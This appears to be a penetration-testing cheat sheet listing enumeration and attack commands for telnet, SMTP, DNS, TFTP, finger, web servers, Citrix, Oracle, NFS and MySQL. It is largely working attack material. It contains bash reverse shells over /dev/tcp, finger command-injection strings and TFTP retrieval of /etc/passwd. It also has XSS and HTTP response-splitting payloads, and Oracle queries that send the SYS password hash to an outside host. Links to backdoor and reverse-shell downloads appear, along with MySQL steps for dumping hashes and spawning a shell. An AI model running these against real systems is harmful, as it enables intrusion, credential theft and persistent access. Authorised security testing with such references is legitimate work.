Fingerprint server
telnet ip_address
Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
telnetfp
Password Attack
Common passwords
Hydra brute force
Brutus
telnet -l "-froot" hostname (Solaris 10+)
Examine configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
Fingerprint server/ service
host
host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
nslookup
nslookup [ -option ... ] [ host-to-find | - [ server ]]
dig
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
DNS Enumeration
Bile Suite
perl BiLE.pl [website] [project_name]
perl BiLE-weigh.pl [website] [input file]
perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
perl vet-mx.pl [input file] [true domain file] [output file]
perl exp-tld.pl [input file] [output file]
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
perl qtrace.pl [ip_address_file] [output_file]
perl jarf-rev [subnetblock] [nameserver]
txdns
txdns -rt -t domain_name
txdns -x 50 -bb domain_name
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
Examine Configuration Files
host.conf
resolv.conf
named.conf
TFTP Enumeration
tftp ip_address PUT local_file
tftp ip_address GET conf.txt (or other files)
Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)
TFTP Bruteforcing
TFTP bruteforcer
Cisco-Torch
User enumeration
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
Fingerprint server
Telnet ip_address port
Firefox plugins
All
firecat
Specific
add n edit cookies
asnumber
header spy
live http headers
shazou
web developer
Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
httprint
Metagoofil
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
Nikto
nikto [-h target] [options]
DirBuster
Wikto
Goolag Scanner
Vulnerability Assessment
Manual Tests
Default Passwords
Install Backdoors
ASP
http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
Assorted
http://michaeldaw.org/projects/web-backdoor-compilation/
http://open-labs.org/hacker_webkit02.tar.gz
Perl
http://home.arcor.de/mschierlm/test/pmsh.pl
http://pentestmonkey.net/tools/perl-reverse-shell/
http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
PHP
http://php.spb.ru/remview/
http://pentestmonkey.net/tools/php-reverse-shell/
http://pentestmonkey.net/tools/php-findsock-shell/
Python
http://matahari.sourceforge.net/
TCL
http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
Bash Connect Back Shell
GnuCitizen
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Adress Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl
put.pl -h target -r /remote_file_name -f local_file_name
webdav
cadaver
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
Input Validation Checks
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
– , = , + , "
Used to craft SQL Injection queries.
‘ , &, ! , ¦ , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
orderby.py
./orderby.py www.site.com/index.php?id=
d3sqlfuzz.py
./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
Vulnerability Scanners
Acunetix
Grendelscan
NStealth
Obiwan III
w3af
Specific Applications/ Server Tools
Domino
dominoaudit
dominoaudit.pl [options] -h <IP>
Joomla
cms_few
./cms.py <site-name>
joomsq
./joomsq.py <IP>
joomlascan
./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
joomscan
./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
jscan
jscan.pl -f hostname
(shell.txt required)
aspaudit.pl
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
Vbulletin
vbscan.py
vbscan.py <host> <port> -v
vbscan.py -update
ZyXel
zyxel-bf.sh
snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
snmpget
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
Burpsuite
Crowbar
Interceptor
Paros
Requester Raw
Suru
WebScarab
Examine configuration files
Generic
Examine httpd.conf/ windows config files
JBoss
JMX Console http://<IP>:8080/jmxconcole/
War File
Joomla
configuration.php
diagnostics.php
joomla.inc.php
config.inc.php
Mambo
configuration.php
config.inc.php
Wordpress
setup-config.php
wp-config.php
ZyXel
/WAN.html (contains PPPoE ISP password)
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN_IPN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)
Config Backups
/RestoreCfg.html
/BackupCfg.html
Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
ZyXEL Config Reader
Examine web server logs
c:\winnt\system32\Logfiles\W3SVC1
awk -F " " '{print $3,$11} filename | sort | uniq
References
White Papers
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Blind Security Testing - An Evolutionary Approach
Command Injection in XML Signatures and Encryption
Input Validation Cheat Sheet
SQL Injection Cheat Sheet
Books
Hacking Exposed Web 2.0
Hacking Exposed Web Applications
The Web Application Hacker's Handbook
Exploit Frameworks
Brute-force Tools
Acunetix
Metasploit
w3af
Citrix Enumeration
Default Domain
Published Applications
./citrix-pa-scan {IP_address/file | - | random} [timeout]
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
Citrix Brute Force
bforce.js
connect.js
Citrix Brute-forcer
Reference Material
Hacking Citrix - the legitimate backdoor
Hacking Citrix - the forceful way
Oracle Enumeration
oracsec
Repscan
Sidguess
Scuba
DNS/HTTP Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
WinSID
Oracle default password list
TNSVer
tnsver host [port]
TCP Scan
Oracle TNSLSNR
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
TNSCmd
perl tnscmd.pl -h ip_address
perl tnscmd.pl version -h ip_address
perl tnscmd.pl status -h ip_address
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
LSNrCheck
Oracle Security Check (needs credentials)
OAT
sh opwg.sh -s ip_address
opwg.bat -s ip_address
sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
OScanner
sh oscanner.sh -s ip_address
oscanner.exe -s ip_address
sh reportviewer.sh oscanner_saved_file.xml
reportviewer.exe oscanner_saved_file.xml
NGS Squirrel for Oracle
Service Register
Service-register.exe ip_address
PLSQL Scanner 2008
Oracle Brute Force
OAK
ora-getsid hostname port sid_dictionary_list
ora-auth-alter-session host port sid username password sql
ora-brutesid host port start
ora-pwdbrute host port sid username password-file
ora-userenum host port sid userlistfile
ora-ver -e (-f -l -a) host port
breakable (Targets Application Server Port)
breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
SQLInjector (Targets Application Server Port)
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
Check Password
orabf
orabf [hash]:[username] [options]
thc-orakel
Cracker
Client
Crypto
DBVisualisor
Sql scripts from pentest.co.uk
Manual sql input of previously reported vulnerabilties
Oracle Reference Material
Understanding SQL Injection
SQL Injection walkthrough
SQL Injection by example
Advanced SQL Injection in Oracle databases
Blind SQL Injection
SQL Cheatsheets
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0x000000.com/?i=14
http://pentestmonkey.net/
NFS Enumeration
showmount -e hostname/ip_address
mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
Interact with NFS share and try to add/delete
Exploit and Confuse Unix
Examine Configuration Files
/etc/exports
/etc/lib/nfs/xtab
HP Enumeration
Authentication Method
Host OS Authentication
Default Authentication
Default Passwords
Wikto
Nstealth
HP Bruteforce
Hydra
Acunetix
Examine Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
Enumeration
nmap -A -n -p3306 <IP Address>
nmap -A -n -PN --script:ALL -p3306 <IP Address>
telnet IP_Address 3306
use test; select * from test;
To check for other DB's -- show databases
Administration
MySQL Network Scanner
MySQL GUI Tools
mysqlshow
mysqlbinlog
Manual Checks
Default usernames and passwords
username: root password:
testing
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname>
mysql -h <Hostname> -u ""@localhost
Configuration Files
Operating System
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
To run many sql commands at once -- mysql -u username -p < manycommands.sql
MySQL data directory (Location specified in my.cnf)
Parent dir = data directory
mysql
test
information_schema (Key information in MySQL)
Complete table list -- select table_schema,table_name from tables;
Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
File privileges -- select user,file_priv from mysql.user where user='root';
Version -- select version();
Load a specific file -- SELECT LOAD_FILE('FILENAME');
SSL Check
mysql> show variables like 'have_openssl';
If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
Privilege Escalation
Current Level of access
mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
mysql> use mysql
mysql> select user,password from user;
Create a new user and grant him privileges
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bash
SQL injection
mysql-miner.pl
mysql-miner.pl http://target/ expected_string database
http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
References.
Design Weaknesses
MySQL running as root
Exposed publicly on Internet
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0